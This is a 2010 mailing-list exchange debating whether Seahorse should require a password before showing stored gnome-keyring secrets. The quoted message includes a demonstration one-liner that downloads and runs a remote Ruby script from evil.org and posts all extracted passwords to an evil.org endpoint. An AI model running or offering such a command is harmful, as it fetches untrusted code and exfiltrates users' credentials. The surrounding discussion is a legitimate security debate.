Re: gnome-keyring Passwords freely available after login

[Yaron Sheffer <yaronf gmx com>]

Hi Florian,

I beg to differ. Requiring a password improves the security of the 
system. Many users don't know about Seahorse, and probably don't care. 
Leaving the passwords openly available will not educate them in any way. 
But this proposed addition would prevent a casual snoop from picking 
their passwords.

I agree we are not "closing the security hole", because an attacker can 
use your nice little script, or any other method, to access the secrets. 
But we are adding *some* security. How much depends very much on user 
behavior.

Thanks,
    Yaron

On 12/13/2010 11:19 PM, Florian Eitel wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA256
>
> Am Mon, 13 Dec 2010 17:59:52 +0200
> schrieb Yaron Sheffer<yaronf gmx com>:
> > Seahorse is available on many machines, and any snoop can come by and
> > view the passwords. What Karl is suggesting (I believe) is that the
> > Seahorse *application* should require the login (or keyring?)
> > password to be entered, even though as an application, it already has
> > access to the passwords.
> >
> > I agree with Karl that this would provide real security benefit, even
> > though a smarter attacker, or one who has more time, can install
> > another application and access the same secrets.
> Sorry but it sounds like some snakeoil if seahorse asks for a password.
> It doesn't makes the system more secure. This only seems more security.
> Of course it's possible to ask for some password but there are enough
> other ways to access the passwords.
>
> In my opinion there are two options:
> * Leave everything open and lock the screen every time
> * Ask for a password on _every query_ of _every application_. But this
>    makes you typing passwords all the time. The Applications should not
>    cache the password for security reasons (e.g. locked memory). So you
>    have to retype your "master"-password every time your email program
>    query the server for new emails, every time you change the
>    network, ever time ...
>
> If somebody doesn't believe me how easily it is, to access all
> passwords I attached some short script.
>
> It takes only seconds do extract all passwords:
>
> ruby -e "$(curl http://evil.org/discoverall.rb )" | curl -d @-
> http://evil.org/receive_passwords.php
>
> In my opinion the User should learn to lock their screen if they
> doesn't trust their environment. Gnome-keyring has many options to
> protect passwords e.g. automatic locking after some time. This can
> really improve the security in contrast of blocking some textfields
> with a password.
>
> Florian
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v2.0.16 (GNU/Linux)
>
> iQIcBAEBCAAGBQJNBo3jAAoJEDG1ZAdA+6K+et0P/iRNUddQINb5ckWRQ9Uy0u3E
> zd8syo4m08gv2/OJXYQWPtd4z5ZeyZ64ye+SarZbJrvAL5kaJJ9L24QDTTr1AnIq
> Mu3xoE5beHVXL3UHZQ5RZJqil0g+Dy22eYpvCE2Vrp3NsK+1fpFVPIGDDs+iMCFI
> Kj7tIfdSf+7M46Y73nRdQOC4J9y08Ra6UQ4M4WphLcz+0B7xlEJS0PYUOG8y+3qO
> fgixcgw6j4S1BCfu2dvl1gLhUhoccxW+v5/EU09J227CZr9GGdQ9R1WW7Ph5MmJo
> xEhnZzNZiTDw78qXgJJV0vnJCr3osfyt+N68dGOsOkFsWeCyjddInEP/QMd6saZh
> lV5wVKcbEQCuusFSWADrffWt7bm/FaInbhsaGogPsSOrpO6fQ8yzaH3K86GKK7Un
> IhIoxcFF9DcjJUHMLo8MXgEJSscDHGe2K5D6qg4vj7kWNCjBPyDOgKX3uLGTte0x
> +3PmixsSaK+B9UGayhuiG7R3xDoVszJM7pG/EoYmvI8bGOGcX6PiVjS9dElsghsM
> L3kdTEE9/RiNpJTJSn0J6CVuFn2YM8Lly4LmQg0/RRUApqwIXdsFyUewzVRRXMEe
> l3UnRSCArrxpnXl1p1b6iT/doRkEohNtze/PXf0ABBE98f1t55c1n7sWDYjArcXx
> je4K3VlJFSqJxH4t4od6
> =BZd0
> -----END PGP SIGNATURE-----